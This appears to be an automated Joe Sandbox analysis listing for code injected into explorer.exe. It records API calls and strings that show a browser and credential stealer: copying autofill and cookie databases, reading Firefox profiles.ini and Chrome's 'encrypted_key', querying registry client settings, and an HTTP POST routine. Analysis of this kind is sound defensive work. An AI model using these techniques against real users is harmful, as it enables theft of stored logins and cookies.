Not Executed

APIs

Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 02793C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793C76
DeleteFileW.KERNELBASE(00000000), ref: 02793C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02793D2F
lstrlen.KERNEL32(00000000), ref: 02793D36
wsprintfA.USER32 ref: 02793D55
lstrlen.KERNEL32(00000000), ref: 02793D61
lstrcat.KERNEL32(00000000,?), ref: 02793D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02793DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02793DED

Strings

AUTOFILL, xrefs: 02793DBD, 02793DC2, 02793DCC
%s = %s, xrefs: 02793D4F
SELECT name,value FROM autofill, xrefs: 02793CAA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 2c9c722fc6f25e793a20837071f6c607c2918e1d47868f76ba45156d759eb7ff
Instruction ID: bbb391a07f56607dff31e415eb708683a00e39717e5a867628ded126b9b87b0e
Opcode Fuzzy Hash: 2c9c722fc6f25e793a20837071f6c607c2918e1d47868f76ba45156d759eb7ff
Instruction Fuzzy Hash: 3B41B730604306ABDF12AB79AC94E3F77AEEF89744F40486CF446A7141DB36DC158B62

Function 027928F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02792AD2

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 027929E1
lstrlen.KERNEL32(00000000), ref: 027929EC
wsprintfA.USER32 ref: 02792A38
lstrlen.KERNEL32(00000000), ref: 02792A44
lstrcat.KERNEL32(00000000,00000000), ref: 02792A6C
lstrlen.KERNEL32(00000000,?,?), ref: 02792A99

Strings

FALSE, xrefs: 02792A06
COOKIES, xrefs: 02792AA4, 02792AAB, 02792AB1
%sTRUE%s%s%s%s%s, xrefs: 02792A32
TRUE, xrefs: 02792A13

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 4bbb6b48b99708160d5388dc290a4d259c4362469adf39d7a9c5617719ca1113
Instruction ID: 4aead4a54e9ea627d1fdb7b55bf2045f8f8ffd70efd38eb32074a0f44ad44410
Opcode Fuzzy Hash: 4bbb6b48b99708160d5388dc290a4d259c4362469adf39d7a9c5617719ca1113
Instruction Fuzzy Hash: 97519F316043479FDF26FF24A854B3F76DAAF89354F04482DF886AB242DB35D8158B62

Function 02792CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02792D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 02792D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,027E637C,?,00000FFF,?), ref: 02792D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02792D7B
lstrlenW.KERNEL32(00000000), ref: 02792DD8

Strings

profiles.ini, xrefs: 02792CCD
IsRelative, xrefs: 02792D75
Profile, xrefs: 02792D3F
Path, xrefs: 02792D62

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 997c515f4c3b74c80a6cde4c8ad8dd7c582b697e60200c6884157d0a94a8683d
Instruction ID: fa44e2853dd41a34402cff45f8a8e5b6a90586b23b2f1235809455fad2616755
Opcode Fuzzy Hash: 997c515f4c3b74c80a6cde4c8ad8dd7c582b697e60200c6884157d0a94a8683d
Instruction Fuzzy Hash: EA31B330744302ABDE15BF39A81463F77A7AFD8710F40442EED4AAB282DB758856CB52

Function 02791333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

Part of subcall function 0279106C: lstrlen.KERNEL32(02C67366,00000000,00000000,00000000,02791366,74DE8A60,02C67366,00000000), ref: 02791074
Part of subcall function 0279106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02C67366,00000001,00000000,00000000), ref: 02791086

Part of subcall function 027912A3: RtlZeroMemory.NTDLL(?,00000018), ref: 027912B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 027913C2
wsprintfW.USER32 ref: 027914B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02791594

Strings

Accept: */*Referer: %S, xrefs: 027914AF
Content-Type: application/x-www-form-urlencoded, xrefs: 027914FB
POST, xrefs: 02791465

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 4c8aae8188a547623de858bdf48a4dc3bdabe705f5d63121bca7b5ef91093f84
Instruction ID: 1abd1550f2baa01ad3db835be1b97b193646d75ed4961c218e2a426cee76d484
Opcode Fuzzy Hash: 4c8aae8188a547623de858bdf48a4dc3bdabe705f5d63121bca7b5ef91093f84
Instruction Fuzzy Hash: 86716E70A04302AFDB11DF28E884A2BBBEDEF88354F40492DF959D7251DB31D924CB62

Function 0279B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0279B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0279B34F

Strings

winShmMap2, xrefs: 0279B2CF
winShmMap3, xrefs: 0279B399
winShmMap1, xrefs: 0279B278

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 8277392e44b609420e3d65282089b21eb43d75e510da7d7795c25c444fbc7da5
Instruction ID: b8c3c43dba2ec30129f7ab9d6f2491d4a26573104ebd7cae120ef025d9829f5a
Opcode Fuzzy Hash: 8277392e44b609420e3d65282089b21eb43d75e510da7d7795c25c444fbc7da5
Instruction Fuzzy Hash: F3518071604741DFDF25CF18E885A6B77F6FB88318F10992EE9868B290DB70E815CB51

Function 0279A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 0279A455
memcpy.NTDLL(?,?,?), ref: 0279A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 0279A4DB
memset.NTDLL ref: 0279A546

Strings

winRead, xrefs: 0279A515

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: 90600da17ac448acb85fee18c36dafdaf16f9699d755f67e52a954b37b54779d
Instruction ID: 6b6bbd8ada2ddf9ce6f3d78aab10f16a82219952e5cc2aff4678f28ac81a8ccd
Opcode Fuzzy Hash: 90600da17ac448acb85fee18c36dafdaf16f9699d755f67e52a954b37b54779d
Instruction Fuzzy Hash: A131AF7260A304AFCB40DE68DD8899F77E6EFC8314F845928FD8597220D730EC048B92

Function 02792E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(?,?), ref: 02792E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02792EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02792F54
RegCloseKey.KERNELBASE(?), ref: 02792F62

Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98

Part of subcall function 02791BC5: lstrlenW.KERNEL32(00000000,00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791BCC
Part of subcall function 02791BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02792E75,PathToExe,00000000,00000000), ref: 02791BF0
Part of subcall function 02791BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02792E75,PathToExe,00000000,00000000), ref: 02791C05
Part of subcall function 02791BC5: lstrlenW.KERNEL32(00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791C1C

Part of subcall function 02791AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02792E83,PathToExe,00000000,00000000), ref: 02791B16

Strings

PathToExe, xrefs: 02792E5E

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 712f75f5ee418676c928319df01063aef2097ad555cb9f6e6c0101a7af262e7e
Instruction ID: 54d5d1e5328b64fca87712d2703c42fd4837a74f6e2d0c4eb1a9060b6e1a3769
Opcode Fuzzy Hash: 712f75f5ee418676c928319df01063aef2097ad555cb9f6e6c0101a7af262e7e
Instruction Fuzzy Hash: 0E318D71604312AF9F16AF25A848C7F7AAAEFC8350B00851CFC5997240EB34C911CFA1

Function 0279A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 0279A6AD
_allmul.NTDLL(00000000,?,?), ref: 0279A6B6
SetEndOfFile.KERNELBASE(?), ref: 0279A6F3

Strings

winTruncate1, xrefs: 0279A6DF
winTruncate2, xrefs: 0279A717

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 3568847005-470713972
Opcode ID: deaa25b86bb1daf32dc1937fdd54f45e424d0572a83b2b8f62de4329138e695e
Instruction ID: b18bed81b732b9dbbc0be99c21506f633725282855ec8d248627a15c5b3153f1
Opcode Fuzzy Hash: deaa25b86bb1daf32dc1937fdd54f45e424d0572a83b2b8f62de4329138e695e
Instruction Fuzzy Hash: D621DE72602301ABDF548E29EC95E6777BAEF88314F418129FD05DB244DB32D810CBB1

Function 02794A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

wsprintfW.USER32 ref: 02794AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02794AC7
RegCloseKey.KERNELBASE(?), ref: 02794AD4

Strings

Software, xrefs: 02794A95
%s\%08x, xrefs: 02794A9C

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: defbb8e8ffa97543f16e80983c4ecb061a982e67e293d192716fff05da043e86
Instruction ID: 86ad52e048ab97366a27f6b4407c8bdeaea9f6b87183a0a68b7311f15a63be8e
Opcode Fuzzy Hash: defbb8e8ffa97543f16e80983c4ecb061a982e67e293d192716fff05da043e86
Instruction Fuzzy Hash: 2101D471A40108FFEF189B54DC49DBF7BADEB45254B40016EF506A3100E6715E519675

Function 02794317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 0279431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02794335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02794363
RegCloseKey.ADVAPI32(?), ref: 027943C8

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

Part of subcall function 0279418A: wsprintfW.USER32 ref: 02794212

Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 027943B9

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 43e8b9d917d21c6cef62baacba516ff0c4a542dc331714bed193fe440b6f7882
Instruction ID: 1354f8e4200c65378b8270f5388676448b51b582cf3a7809e615ce017be754f1
Opcode Fuzzy Hash: 43e8b9d917d21c6cef62baacba516ff0c4a542dc331714bed193fe440b6f7882
Instruction Fuzzy Hash: 801163B1504301BFEB159B20DC48DBF77EDEB88314F00492DB849D2100EB749D559A72

Function 0279B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0279B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0279B96F

Strings

psow, xrefs: 0279BA95
winOpen, xrefs: 0279BA22

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: 46363d8f7065039edd2880bd359941809c80e8b05a8fb3c8a294eed5f39f511e
Instruction ID: 866529563740e454aaa933f1a58127d78e0020f92d2e696334c4a709ffc20108
Opcode Fuzzy Hash: 46363d8f7065039edd2880bd359941809c80e8b05a8fb3c8a294eed5f39f511e
Instruction Fuzzy Hash: F9717D71A047019FDB11DF24E885B1ABBE5FF88728F005A2DF864A7290D774D914CF92

Function 027919E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98

Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 52595400901fc9d97eba10ddf491ae564e40a64e9ec7c9cebaf2f81502916f86
Instruction ID: 5f0eada8842d93dbf7d3fee487dafb304147665a42dd2edfc902b17f6d7dd29f
Opcode Fuzzy Hash: 52595400901fc9d97eba10ddf491ae564e40a64e9ec7c9cebaf2f81502916f86
Instruction Fuzzy Hash: F421A172605342AFEF258A21ED08F7BB7EDEBC8758F444A2DF98996150E731CD208671

Function 02791EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 02791ED5

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791F0C
RegCloseKey.ADVAPI32(?), ref: 02791F98

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791F82

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 1cae7a76352ee02d27a4a5557801f176db68fd2d05809c2ee657070f48e01d6e
Instruction ID: 5bef6a0480a949af610d87dfd7d7896cf38ede478b3a156c35d87bfd32dfa08c
Opcode Fuzzy Hash: 1cae7a76352ee02d27a4a5557801f176db68fd2d05809c2ee657070f48e01d6e
Instruction Fuzzy Hash: F721A171608306AFDB059B24EC48E3F7BEEEF88358F40892CF49A92100DB75C924DB21

Function 02791C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02793E1E,00000000,?,02793FA8), ref: 02791C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,02793FA8), ref: 02791C56
CloseHandle.KERNEL32(00000000,?,02793FA8), ref: 02791C91

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02793FA8), ref: 02791C76

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 325f8066150943d56e5b53d715a3d496fb3faf66301a7efdb6da920a14d47587
Instruction ID: 709cb13c20b662f1890184fc2df3af4dffc1b5057e3db445ca18f765feee723b
Opcode Fuzzy Hash: 325f8066150943d56e5b53d715a3d496fb3faf66301a7efdb6da920a14d47587
Instruction Fuzzy Hash: B2F02832201318BBCA205A29EC8CE7B7B5CDB476F9F120718F40A961C0EB2358219171

Function 02792FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02793E30,00000000,00000000,?,02793FA8), ref: 02792FC1
lstrlen.KERNEL32("encrypted_key":",?,02793FA8), ref: 02792FCE
StrStrIA.SHLWAPI("encrypted_key":",027E692C,?,02793FA8), ref: 02792FDD

Part of subcall function 0279190B: lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
Part of subcall function 0279190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,?), ref: 02791946
Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,00000000), ref: 0279194A

Strings

"encrypted_key":", xrefs: 02792FBA, 02792FBF, 02792FCD, 02792FDC

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: 0ab49c25eca727154daf3a5867006123417c1b58ea4439fe8e8c0547ff1ad0bf
Instruction ID: 569615ded785605ed30a3e384fc5ade0a2c339947d4b7be6166a6ac7a19ccb7a
Opcode Fuzzy Hash: 0ab49c25eca727154daf3a5867006123417c1b58ea4439fe8e8c0547ff1ad0bf
Instruction Fuzzy Hash: AAE02B32E45764AF9F227BB53C449873F1D9E2B0243054074F50287103DF618405C2B4

Function 0279BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0279BB40

Strings

winDelete, xrefs: 0279BB6A

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: 414e79733dcae027e90b5f177f8a762799340b4de3070bf3fd9224f816ebadd0
Instruction ID: 4494cbfb6e3a86aed71ac5b68acbca1db28c3eb5fd85fc2d4700758aa77d088c
Opcode Fuzzy Hash: 414e79733dcae027e90b5f177f8a762799340b4de3070bf3fd9224f816ebadd0
Instruction Fuzzy Hash: D911C431A04308EBDF11EB79B885D7D777ADB81768F105569E906E72C8DB308901DB92

Function 02792EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02791011: GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
Part of subcall function 02791011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02792EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02792F54
RegCloseKey.KERNELBASE(?), ref: 02792F62

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: f60a0999367eb26ff7cee05bf4ebd618879ec507dae36a895ee7403b622f6514
Instruction ID: cdbd7546e93463e218e0bf8a26616d752b6f34f63c6c7120c5ec073eb79a86e5
Opcode Fuzzy Hash: f60a0999367eb26ff7cee05bf4ebd618879ec507dae36a895ee7403b622f6514
Instruction Fuzzy Hash: 42016731204351AB8F15AF25EC08D7F7BAEEFC9354F00481DF85996140DB368965DFA1

Function 02794B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02794B74
CoUninitialize.COMBASE ref: 02794B83
ExitProcess.KERNEL32 ref: 02794B8B

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 68cc94d092f484cb7ea88a5f5f1e0ab145eba61156cee6375e850599d43d59b9
Instruction ID: a597b61c2054de03d6e4591524edcc9744a72bf4668e4ede4aafa72340894ea2
Opcode Fuzzy Hash: 68cc94d092f484cb7ea88a5f5f1e0ab145eba61156cee6375e850599d43d59b9
Instruction Fuzzy Hash: B4C04C35A84200CBEE812BE06C1D70A355DAB18B12F008804E209CD080EB7040118B36

Function 02799FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

